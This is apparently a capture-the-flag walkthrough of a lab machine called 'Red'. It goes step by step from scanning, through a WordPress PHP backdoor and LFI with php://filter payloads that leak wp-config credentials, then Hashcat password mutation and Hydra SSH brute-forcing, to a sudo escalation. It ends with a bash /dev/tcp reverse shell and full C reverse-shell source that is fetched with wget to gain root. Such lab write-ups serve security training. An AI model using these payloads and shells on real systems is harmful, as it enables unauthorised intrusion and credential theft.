As Blue team cybersecurity analysts, we discovered a Local File Inclusion (LFI) backdoor on a website utilizing the WordPress framework. Through utilizing Hashcat rules and password mutation techniques, we were able to uncover login credentials and regain access to the compromised machine, known as the โRedโ machine. However, it is important to note that the malicious actor (referred to as โRedโ) will likely take additional defensive measures to maintain their access and prevent our efforts to regain control.
So Firstly we would need to boot up our machine in our Virtualbox instance(ensure That your Virtualbox network setting has been set to bridged adapter to enable you Attack from your main Host OS).
with our machine started we would need to discover the Targets Ip Address by running the codes below in our terminalnetdiscover -i <Network interface Name>
Note that your IP address range might be different
now that we have discovered our Targets Ip address we move to the first process of every Attack,
First thing we need to do is Scanning,To find the services running on our target system we will use Nmap tool here using command-nmap -sV -sC -Pn <targets IP>
We get our results as :
with the Nmap Scan successful We Can see That We Have 2 ports open:
1.port 22 running openssh 8.1
2.port 80 running Apache httpd 2.4.41
the apache port 80 means we have a webpage so lets head over to our browser and input our target ip address to access the webpage.
Upon inspecting the website, it was determined that it was a WordPress site, however it was not loading properly. To resolve this issue, we added the websiteโs address to our host file by utilizing the following code.nano /etc/hosts
now we can see a warning message from Red presented to us Stating that our site Has been HACKED.Red also gives us a clue about a backdoor.
so lets run some directory brutefore using Gobustergobuster dir -u <target IP> -W CommonBackdoors-PHP.fuzz.txt -s 200,204,301,302,307,401,403,500
to get the CommonBackdoors-PHP.fuzz.txt wget this file to your system using this commandwget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
Here I am using Gobuster and we get the following results :
Here we can see that we have our directory: /NetworkFileManagerPHP.php
Now navigate around the website and development directory on the website.
We find something like this ->
If we google that backdoor:
It is a webshell backdoor. But based on our hint we know that Red is using it as some type of LFI backdoor.Letโs use WFUZZ to test our theory:
use wget to get this wordlist :wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/burp-parameter-names.txt
wfuzz -c -u ‘http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test’ -w <path to the wordlist>burp-parameter-names.txt
on our success Letโs test our theory of Local File Inclusion by obtaining a result for the parameter key.
When assessing the security of a WordPress website, the process includes reviewing the source code for vulnerabilities, particularly the wp-config.php file which holds the database credentials. To accomplish this task, we can utilize PHP Wrappers and CyberChef. The PHP Wrappers allow us to access the wp-config.php file and other sensitive files on the server, while CyberChef, a web-based tool, helps us to perform operations such as decoding and encoding, compression and decompression and more.
so we search online for payloadallthethings github
search payloadallthethings
now you would want to navigate to the php filter section which is located under the File inclusion folder
we make use of this payloadphp://filter/convert.base64-encode/resource=index.php
http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=wp-config.php
now we have our config file in base64 format so we would need Another useful tool which is CyberChef, which is a web-based, all-in-one tool that can be used to perform a variety of operations on the data, including decoding and encoding, compression and decompression, and more. By using these tools, we can quickly and easily review the code and determine if there are any vulnerabilities that need to be addressed.PD9waHANCi8qKg0KICogVGhlIGJhc2UgY29uZmlndXJhdGlvbiBmb3IgV29yZFByZXNzDQogKg0KICogVGhlIHdwLWNvbmZpZy5waHAgY3JlYXRpb24gc2NyaXB0IHVzZXMgdGhpcyBmaWxlIGR1cmluZyB0aGUgaW5zdGFsbGF0aW9uLg0KICogWW91IGRvbid0IGhhdmUgdG8gdXNlIHRoZSB3ZWIgc2l0ZSwgeW91IGNhbiBjb3B5IHRoaXMgZmlsZSB0byAid3AtY29uZmlnLnBocCINCiAqIGFuZCBmaWxsIGluIHRoZSB2YWx1ZXMuDQogKg0KICogVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBmb2xsb3dpbmcgY29uZmlndXJhdGlvbnM6DQogKg0KICogKiBNeVNRTCBzZXR0aW5ncw0KICogKiBTZWNyZXQga2V5cw0KICogKiBEYXRhYmFzZSB0YWJsZSBwcmVmaXgNCiAqICogQUJTUEFUSA0KICoNCiAqIEBsaW5rIGh0dHBzOi8vd29yZHByZXNzLm9yZy9zdXBwb3J0L2FydGljbGUvZWRpdGluZy13cC1jb25maWctcGhwLw0KICoNCiAqIEBwYWNrYWdlIFdvcmRQcmVzcw0KICovDQovLyAqKiBNeVNRTCBzZXR0aW5ncyAtIFlvdSBjYW4gZ2V0IHRoaXMgaW5mbyBmcm9tIHlvdXIgd2ViIGhvc3QgKiogLy8NCi8qKiBUaGUgbmFtZSBvZiB0aGUgZGF0YWJhc2UgZm9yIFdvcmRQcmVzcyAqLw0KZGVmaW5lKCAnREJfTkFNRScsICd3b3JkcHJlc3MnICk7DQoNCi8qKiBNeVNRTCBkYXRhYmFzZSB1c2VybmFtZSAqLw0KZGVmaW5lKCAnREJfVVNFUicsICdqb2huJyApOw0KDQovKiogTXlTUUwgZGF0YWJhc2UgcGFzc3dvcmQgKi8NCmRlZmluZSggJ0RCX1BBU1NXT1JEJywgJ1Izdl9tNGx3aDNyM19rMW5HISEnICk7DQoNCi8qKiBNeVNRTCBob3N0bmFtZSAqLw0KZGVmaW5lKCAnREJfSE9TVCcsICdsb2NhbGhvc3QnICk7DQoNCi8qKiBEYXRhYmFzZSBDaGFyc2V0IHRvIHVzZSBpbiBjcmVhdGluZyBkYXRhYmFzZSB0YWJsZXMuICovDQpkZWZpbmUoICdEQl9DSEFSU0VUJywgJ3V0ZjgnICk7DQoNCi8qKiBUaGUgRGF0YWJhc2UgQ29sbGF0ZSB0eXBlLiBEb24ndCBjaGFuZ2UgdGhpcyBpZiBpbiBkb3VidC4gKi8NCmRlZmluZSggJ0RCX0NPTExBVEUnLCAnJyApOw0KDQpkZWZpbmUoJ0ZTX01FVEhPRCcsICdkaXJlY3QnKTsNCg0KZGVmaW5lKCdXUF9TSVRFVVJMJywgJ2h0dHA6Ly9yZWRyb2Nrcy53aW4nKTsNCmRlZmluZSgnV1BfSE9NRScsICdodHRwOi8vcmVkcm9ja3Mud2luJyk7DQoNCi8qKiNAKw0KICogQXV0aGVudGljYXRpb24gdW5pcXVlIGtleXMgYW5kIHNhbHRzLg0KICoNCiAqIENoYW5nZSB0aGVzZSB0byBkaWZmZXJlbnQgdW5pcXVlIHBocmFzZXMhIFlvdSBjYW4gZ2VuZXJhdGUgdGhlc2UgdXNpbmcNCiAqIHRoZSB7QGxpbmsgaHR0cHM6Ly9hcGkud29yZHByZXNzLm9yZy9zZWNyZXQta2V5LzEuMS9zYWx0LyBXb3JkUHJlc3Mub3JnIHNlY3JldC1rZXkgc2VydmljZX0uDQogKg0KICogWW91IGNhbiBjaGFuZ2UgdGhlc2UgYXQgYW55IHBvaW50IGluIHRpbWUgdG8gaW52YWxpZGF0ZSBhbGwgZXhpc3RpbmcgY29va2llcy4NCiAqIFRoaXMgd2lsbCBmb3JjZSBhbGwgdXNlcnMgdG8gaGF2ZSB0byBsb2cgaW4gYWdhaW4uDQogKg0KICogQHNpbmNlIDIuNi4wDQogKi8NCmRlZmluZSgnQVVUSF9LRVknLCAgICAgICAgICcydXVCdmM4U081ez5Vd1E8XjVWNVtVSEJ3JU59LUJ3V3F3fD48KkhmQndKKCAkJiUsKFpiZy9qd0ZrUkhmfnZ8Jyk7DQpkZWZpbmUoJ1NFQ1VSRV9BVVRIX0tFWScsICAnYWh9PElgNTJHTDZDXkB
now we use convert from base64 on our cyberchef panel and then paste our base64 code in the input to get our decoded output.
IT should look like this:
we discovered that we have a database name as โwordpressโ and a database username and password as โjohnโ and โR3v_m4lwh3r3_k1nG!!โ
now with this information we got back to the homepage and access this link made by a user called ADMINISTRATORhttp://redrocks.win/2021/10/24/hello-world/
now we have a username so lets try accessing the wordpress login page and using this credentialshttp://redrocks.win/wp-login.php
now lets try to attempt logging in with the username โadministratorโ and the password we got from the wp-config file
so after trying the creds we get an error saying The password you entered for the username administrator is incorrect
now another thing to do is to take the NetworkFileManagerPHP.php and add it at the end of our php filter to see what we gethttp://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=NetworkFileManagerPHP.php
we can see that we also get a different code encrypted in base64
PD9waHAKICAgJGZpbGUgPSAkX0dFVFsna2V5J107CiAgIGlmKGlzc2V0KCRmaWxlKSkKICAgewogICAgICAgaW5jbHVkZSgiJGZpbGUiKTsKICAgfQogICBlbHNlCiAgIHsKICAgICAgIGluY2x1ZGUoIk5ldHdvcmtGaWxlTWFuYWdlclBIUC5waHAiKTsKICAgfQogICAvKiBWR2hoZENCd1lYTnpkMjl5WkNCaGJHOXVaU0IzYjI0bmRDQm9aV3h3SUhsdmRTRWdTR0Z6YUdOaGRDQnpZWGx6SUhKMWJHVnpJR0Z5WlNCeWRXeGxjdz09ICovCj8
now lets head over to cyberchef to bake this code and figure out what we get
as you can see after our recipe has been baked we also get a code in base64 at the bottom of our outputVGhhdCBwYXNzd29yZCBhbG9uZSB3b24ndCBoZWxwIHlvdSEgSGFzaGNhdCBzYXlzIHJ1bGVzIGFyZSBydWxlcw==
so now lets decode this using the same procedure and see what we get
wow! after decoding the base64 string we got a message from RED saying:That password alone won’t help you! Hashcat says rules are rules
so iโm guessing we would need to use Hashcat rules.we would need to create a password list list using the hashcat rulenano pass.txt
then paste the password we got from the wp-config file โR3v_m4lwh3r3_k1nG!!โ
then save our password
then we go to hashcat rule in our directory using the command belowls -al /usr/share/hashcat/rules/
so we would be making use of best64.rule by using this commandhashcat –force pass.txt -r /usr/share/hashcat/rules/best64.rule –stdout > wordlist.txt
so now we can view our freshly created wordlist.txt file by usingnano wordlist.txt
now you remember we discovered 2 open service ports during our Recon stage,this is where ssh port come to play its part.
We would be making use of Tool called Hydra.Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add which is why we would be making use of it today. hydra -l john -P wordlist.txt <target machine IP> ssh
- -l is our username(a file list with usernames can also be used but we be making use of only a single user name โjohnโ)
- -P is our password list
- ssh at the end declares what types of service we are bruteforcing
and now at the end of our bruteforce attack, we get a match. now we can try to SSH into the Serverssh john@<server IP>
And we are in. Letโs see what else Red has put in store for us.
we have just observed that red has already setup some Kind of Cronjob command to use as a distraction.
Also red has setup a defense mechanism to log us out after 5minutes and change the Password
in our test for LFI we could see that we have a user called ippsec and we can also login successfully without a password
SO to login as ippsec we use the following commandsudo -l
sudo -u ippsec /usr/bin/time /bin/bash
and now we are successfully logged in as ippsec:
now Firstly we need to act quick and disable the cronjob system to avoid been logged out
to do this we make use of this command and create a bash script file in that directorycd /dev/shm
ls -la
nano shell.sh
bash -i >& /dev/tcp/<kali machine IP>/9001 0>&1
tac shell.sh
chmod +x shell.sh
bash shell.sh
now we need to create a netcat listener so thatwe can get a revshell to the machinerlwrap nc -lnvp 9001
once we get a revshell to the machine we would need to use this python commandpython3 -c ‘import pty;pty.spawn(“/bin/bash”)’
This is a command used to spawn a new shell process and attach it to a pseudo-terminal (pty) on a Unix-like system. When executed, it will open a new terminal window with a shell prompt. The command is using the pty
module to spawn a new process that runs the command /bin/bash
, which is the default shell on many Linux and Unix-like operating systems. This can be used to open a new terminal window with a shell prompt and a persistent terminal session. It is important to note that this command is a potential security vulnerability because it allows an attacker to gain unauthorized access to a system.
now we background our netcat session by usingCTRL + Z
and next we input this command and press the Enter Key twicestty raw -echo;fg
his command sets the terminal to โrawโ mode and turns off โechoโ mode.
so that means we would not be getting any annoying message from red anymoreexport TERM=xterm
now with this process complete once we get kicked out,we would still have access to the shell
now lets navigate to the var foldercd /var/www/wordpress
ls -la
now we can see a .git folder which is owned by root and ippsec. we need to move into this folder
we can see a file called supersecretfileuc.c, now lets view the content of this file by using tac:tac supersecretfileuc.c
now we can see that the C script is a cronjob and if we try executing the rev script we can see that it loads the cronjob message.
we need to remove this file but also kindly take not of the name attached to the file
now we create a new file on our system with the same name โsupersecretfile.cโ
we must also remove the rev filerm -r rev
now we put this revshell script into our new file#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port=9001;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr(“<kali machine IP”);
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {“/bin/bash”, NULL};
execve(“/bin/bash”, argv, NULL);
return 0;
}
now we start a python server to get this file on our target machinepython3 -m http.server 8081
now on our ippsec@red shell,we would need to use wget to download the file from our python server hosted on our main kali machinewget http://<machine local ip>:8081/supersecretfile.c
now if we list our directory we can see that we have our file back into the systemls -la
now we start our rlwrap netcat listenerrlwrap nc -lnvp 9001
once this is done we wait for about 2 minutes and we get a shell as root
on our shell we use the following commands and then we discovered the use flag red was talking about.whoami
ls
tac root.txt
if you got to this point,then Congratulations you have just PWNED RED.
I hope you enjoyed the machine and the write-up! ๐
Leave a Reply